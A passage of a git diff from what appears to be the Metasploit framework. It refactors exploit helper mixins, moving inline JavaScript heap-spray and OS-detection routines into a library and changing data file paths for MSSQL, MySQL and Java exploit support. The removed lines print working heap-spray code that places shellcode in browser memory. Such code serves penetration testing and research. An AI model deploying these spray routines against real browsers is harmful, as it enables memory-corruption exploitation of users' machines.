== undefined) { throw "Missing argument: shellcode"; } - if (offset == undefined) { offset = 0; } - if (heapBlockSize == undefined) { throw "Size must be defined"; } - - buf = ""; - for (i=0; i < heapBlockSize/4; i++) { - if (i == offset) { - if (i == 0) { buf += shellcode; } - else { buf += ";" + shellcode; } - } - else { - buf += ";##{Rex::Text.rand_text_hex(6)}"; - } - } - - e = document.getElementById(objId); - if (e == null) { - eleId = "#{Rex::Text.rand_text_alpha(5)}" - acTag = "" - document.body.innerHTML = document.body.innerHTML + acTag; - e = document.getElementById(eleId); - } - try { e.values = buf; } - catch (e) {} - } - | + @cache_mstime_malloc ||= Rex::Exploitation::Js::Memory.mstime_malloc end # @@ -984,90 +795,22 @@ protected # # Example of using the 'sprayHeap' function: # # def js_property_spray - sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5) - js = %Q| - var #{sym_div_container}; - function sprayHeap( oArg ) { - - shellcode = oArg.shellcode; - offset = oArg.offset; - heapBlockSize = oArg.heapBlockSize; - maxAllocs = oArg.maxAllocs; - objId = oArg.objId; - - if (shellcode == undefined) { throw "Missing argument: shellcode"; } - if (offset == undefined) { offset = 0x00; } - if (heapBlockSize == undefined) { heapBlockSize = 0x80000; } - if (maxAllocs == undefined) { maxAllocs = 0x350; } - - if (offset > 0x800) { throw "Bad alignment"; } - - #{sym_div_container} = document.getElementById(objId); - - if (#{sym_div_container} == null) { - #{sym_div_container} = document.createElement("div"); - } - - #{sym_div_container}.style.cssText = "display:none"; - var data; - junk = unescape("%u2020%u2020"); - while (junk.length < offset+0x1000) junk += junk; - - data = junk.substring(0,offset) + shellcode; - data += junk.substring(0,0x800-offset-shellcode.length); - - while (data.length < heapBlockSize) data += data; - - for (var i = 0; i < maxAllocs; i++) - { - var obj = document.createElement("button"); - obj.title = data.substring(0, (heapBlockSize-2)/2); - #{sym_div_container}.appendChild(obj); - } - } - | + @cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray end def js_heap_spray - js = %Q|var memory = new Array(); -function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) { - var index; - var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16); - var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16); - while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; } - while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; } - - var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo); - while (retSlide.length < heapBlockSize) { retSlide += retSlide; } - retSlide = retSlide.substring(0, heapBlockSize - shellcode.length); - - var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize; - for (index = 0; index < heapBlockCnt; index++) { - memory[index] = retSlide + shellcode; - } -} -| - opts = { - 'Symbols' => { - 'Variables' => %w{ shellcode retSlide payLoadSize memory index - heapSprayAddr_lo heapSprayAddr_hi heapSprayAddr heapBlockSize - heapBlockCnt }, - 'Methods' => %w{ sprayHeap } - } - } - js = ::Rex::Exploitation::ObfuscateJS.new(js, opts) - return js + @cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray end def js_os_detect - return ::Rex::Exploitation::JavascriptOSDetect.new + @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os end # Transmits a html response to the supplied client diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb index 216d41f091..491babc19a 100644 --- a/lib/msf/core/exploit/java.rb +++ b/lib/msf/core/exploit/java.rb @@ -51,7 +51,7 @@ module Exploit::Java # Instantiate the JVM with a classpath pointing to the JDK tools.jar # and our javatoolkit jar. - classpath = File.join(Msf::Config.install_root, "data", "exploits", "msfJavaToolkit.jar") + classpath = File.join(Msf::Config.data_directory, "exploits", "msfJavaToolkit.jar") classpath += ":" + toolsjar classpath += ":" + datastore['ADDCLASSPATH'] if datastore['ADDCLASSPATH'] diff --git a/lib/msf/core/exploit/local/unix.rb b/lib/msf/core/exploit/local/unix.rb deleted file mode 100644 index 5a35ebbe63..0000000000 --- a/lib/msf/core/exploit/local/unix.rb +++ /dev/null @@ -1,19 +0,0 @@ - -module Msf -module Exploit::Local::Unix - - include Exploit::Local::CompileC - - def unix_socket_h(metasm_exe) - [ - "external/source/meterpreter/source/bionic/libc/include/sys/socket.h", - ].each do |fname| - cparser.parse(File.read(fname), fname) - end - - end - - -end -end - diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 810f87492e..b1dd01add0 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm' require 'msf/core/exploit/cmdstager_tftp' require 'msf/core/exploit/cmdstager_bourne' require 'msf/core/exploit/cmdstager_echo' +require 'msf/core/exploit/cmdstager_printf' # Protocol require 'msf/core/exploit/tcp' diff --git a/lib/msf/core/exploit/mssql.rb b/lib/msf/core/exploit/mssql.rb index 3c52a62774..5b3466dda1 100644 --- a/lib/msf/core/exploit/mssql.rb +++ b/lib/msf/core/exploit/mssql.rb @@ -75,7 +75,7 @@ module Exploit::Remote::MSSQL register_advanced_options( [ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk", - File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b") + File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b") ]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION']) ], Msf::Exploit::Remote::MSSQL) diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb index 4f5f5c36b2..415da84c67 100644 --- a/lib/msf/core/exploit/mssql_sqli.rb +++ b/lib/msf/core/exploit/mssql_sqli.rb @@ -34,7 +34,7 @@ module Exploit::Remote::MSSQL_SQLI register_advanced_options( [ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk", - File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b") + File.join(Msf::Config.data_directory, "exploits", "mssql", "h2b") ]) ], Msf::Exploit::Remote::MSSQL_SQLI) diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index 82a07f6619..23a26ad7c5 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -150,7 +150,7 @@ module Exploit::Remote::MYSQL def mysql_upload_sys_udf(arch=:win32,target_path=nil) fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll") - sys_dll = File.join( Msf::Config.install_root, "data", "exploits", "mysql", fname ) + sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname ) data = File.open(sys_dll, "rb") {|f| f.read f.stat.size} blob = "0x" blob << data.unpack("C*").map {|x| "%02x" % [x]}.join diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb index e5bdf69cc3..c424182883 100644 --- a/lib/msf/core/exploit/powershell.rb +++ b/lib/msf/core/exploit/powershell.rb @@ -116,7 +116,7 @@ module Exploit::Powershell ps_wrapper = <